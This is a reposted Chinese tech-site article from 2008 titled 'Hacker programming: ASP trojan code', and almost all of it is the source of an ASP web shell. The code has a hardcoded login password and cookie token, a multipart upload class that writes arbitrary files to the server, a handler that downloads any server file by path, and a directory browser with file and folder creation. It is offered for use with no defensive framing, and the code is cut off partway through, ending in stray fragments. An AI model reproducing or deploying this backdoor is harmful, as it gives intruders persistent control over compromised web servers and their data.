newasp home
用户管理  |  用户注册
首 页 ┆ 文章中心 ┆ 下载中心 ┆ 社区论坛 ┆ 客户留言
  • 站点首页
  • 电脑网络技术
  • 图形图象技术
  • 网络应用
  • 多媒体技术
  • 电脑入门初步
  • 网络推广技术
  • 数据库设计
  • Linux技术
  • 网络动态
用户名: 密码:
当前位置:PC我爱社区 → 文章中心 → 数据库设计 → 文章内容

黑客编程:ASP木马代码

减小字体 增大字体 作者:网络  来源:转载  发布时间:2008-2-23 15:06:38

COOCO视频会议实现沟通创造价值!    影视制作、广告摄影、3D制作、企业形象策划
文红论文网提供各类论文发表和翻译 像素科技--全力推出主机租用特惠行动!

<%@ LANGUAGE = VBScript.Encode codepage ='936' %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oScript scope=page classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8'></object>
<object runat=server id=oScriptNet scope=page classid='clsid:093FF999-1EA0-4079-9525-9614C3504B74'></object>
<object runat=server id=oFileSys scope=page classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object>
<%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=''
else
Form=objForm(strForm)
end if
end function

Public function File(strFile)
strFile=lcase(strFile)

if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function


Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version='HTTP上传程序 Version 2.0'
set objForm=Server.CreateObject('Scripting.Dictionary')
set objFile=Server.CreateObject('Scripting.Dictionary')
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject('adodb.stream')
set Data_5xsoft = Server.CreateObject('adodb.stream')
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read

iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ='gb2312'
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,'name=''',1)+6
iFindEnd = InStr(iFindStart,sInfo,'''',1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,'filename=''',1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,'filename=''',1)+10
iFindEnd = InStr(iFindStart,sInfo,'''',1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,'Content-Type: ',1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ='gb2312'
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&', '&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=''
set tStream =nothing
End Sub

Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub

Private function GetFilePath(FullPath)
If FullPath <> '' Then
GetFilePath = left(FullPath,InStrRev(FullPath, '\'))
Else
GetFilePath = ''
End If
End function

Private function GetFileName(FullPath)
If FullPath <> '' Then
GetFileName = mid(FullPath,InStrRev(FullPath, '\')+1)
Else
GetFileName = ''
End If
End function
End Class

Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ''
FilePath = ''
FileSize = 0
FileStart= 0
FormName = ''
FileType = ''
End Sub


Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)='' or FileStart=0 or FileName='' or right(fullpath,1)='/' then exit function
set dr=CreateObject('Adodb.Stream')
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables('server_name')
rseb=Request.ServerVariables('SCRIPT_NAME')
q=request('q')
if q='' then q=rseb
select case q
case rseb
if Epass(trim(request.form('password')))='q_ux888556' then
response.cookies('password')='7758521'
response.redirect rseb & '?q=list.asp'
else %>
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>
<title><%=httpt%></title>
<meta name='GENERATOR' content='Microsoft FrontPage 3.0'>
</head>

<body>
<%if request.form('password')<>'' then
response.write 'Password Error!'
end if
%>

<table border='1' width='100%' height='89' bgcolor='#DFDFFF' cellpadding='3'
bordercolorlight='#000000' bordercolordark='#F2F2F9' cellspacing='0'>
<tr>
<td width='100%' height='31' bgcolor='#000080'><p align='center'><font color='#FFFFFF'><%=httpt%></font></td>
</tr>
<tr>
<td width='100%' height='46'><form method='POST' action='<%=rseb%>?q=<%=rseb%>'>
<div align='center'><center><p>Enter Password:<input type='password' name='password'
size='20'
style='border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset'>
<input type='submit' value='OK!LOGIN' name='B1'
style='font-size: 9pt; border: thin outset'></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>

<%case 'down.asp'
call downloadFile(request('path'))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject('adodb.stream')
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write('<h1>Error:</h1>' & strFilename & ' does not exist<p>')
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write('<h1>Error: </h1>' & err.Description & '<p>')
Response.End
end if
Response.AddHeader 'Content-Disposition', 'attachment; filename=' & f.name
Response.AddHeader 'Content-Length', intFilelength
Response.CharSet = 'UTF-8'
Response.ContentType = 'application/octet-stream'
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case 'list.asp'%>
<%
urlpath=server.urlencode(path)
if Request.Cookies('password')='7758521' then
dim cpath,lpath
if Request('path')='' then
lpath='/'
else
lpath=Request('path')&'/'
end if
if Request('attrib')='true' then
cpath=lpath
attrib='true'
else
cpath=Server.MapPath(lpath)
attrib=''
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write'<a href='' & rseb & '?q=list.asp&path='&Request('oldpath')&'&attrib='&attrib&''><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br><script language=vbscript>'
For Each x In theSubFolders
%>so '<%=lpath%>','<%=x.Name%>','<%=request('path')%>','<%=attrib%>'
<%
Next
%></script><%
end if
End Sub

Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write'<table border='0' width='100%' cellpadding='0'><script language=vbscript>'
For Each x In theFiles
if Request('attrib')='true' then
showstring=x.Name
else
showstring=x.Name
end if
%>sf '<%=showstring%>','<%=x.size%>','<%=x.type%>','<%=x.Attributes%>','<%=x.DateLastModified%>','<%=lpath%>','<%=x.name%>','<%=attrib%>','<%=x.name%>'
<%
Next
end if
Response.write'</script></table>'
End Sub
%>
<html>

<head>
<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>
<title><%=httpt%></title>
<style type='text/css'>
<!--
table{ font-family: 宋体; font-size: 9pt }
a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }
a:visited{ color: rgb(128,0,0) }
td { font-size: 9pt}
a { color: #000000; text-decoration: none}
a:hover { text-decoration: underline}
.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}
.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}
.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}
-->
</style>
</head>
<script language='JavaScript'>
function crfile(ls)
{if (ls==''){alert('请输入文件名!');}
else {window.open('<%=rseb%>?q=edit.asp&attrib=<%=request('attrib')%>&creat=yes&path=<%=lpath%>'+ls);}
return false;
}
function crdir(ls)
{if (ls==''){alert('请输入文件名!');}
else {window.open('<%=rseb%>?q=edir.asp&attrib=<%=request('attrib')%>&op=creat&path=<%=lpath%>'+ls);}
return false;
}
</script>
<script language='vbscript'>
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write '<tr style=''color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080'' )
end function
%>

[] [返回上一页] [打 印]
  • ·上一篇文章:黑客编程:Delphi写QQ聊天记录器演示程序
  • ·下一篇文章:编制完美的IE网页木马

文章评论评论内容只代表网友观点,与本站立场无关!

用户名: ! 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容: !

         (注“!”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码

频道栏目导航

  • 电脑网络技术
  • 图形图象技术
  • 网络应用
  • 多媒体技术
  • 电脑入门初步
  • 网络推广技术
  • 数据库设计
  • Linux技术
  • 网络动态
  • 更多分类

本类热门阅览

  • · 如何建立SQL Server 2005数据库邮件...
  • · C# 怎样实现远程连接SQL Server200...
  • · SQL 2005 XML最佳实施策略用法
  • · SQL Server2005高可用性方面的不足...
  • · 在SQL Server 2005中解决死锁问题
  • · Sql server 2005密码安全追踪与存储...
  • · SQL Server2005数据库连接中常见问...
  • · VS 2008和老的VS 2005附件包的兼容...
  • · 专家预言:PHP将比Java更受开发人员...
  • · Windows操作系统下JSP程序开发环境...
  • · Windows下如何用vc直接编译连接DDK...
  • · 黑客编程:ASP木马代码

相关文章

  • ·黑客编程:ASP木马代码
  • ·黑客编程:Delphi写QQ聊天记录器演示程序

关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登陆

PC我爱社区 站长:子昀 点击这里和我联系
沪ICP备06047794号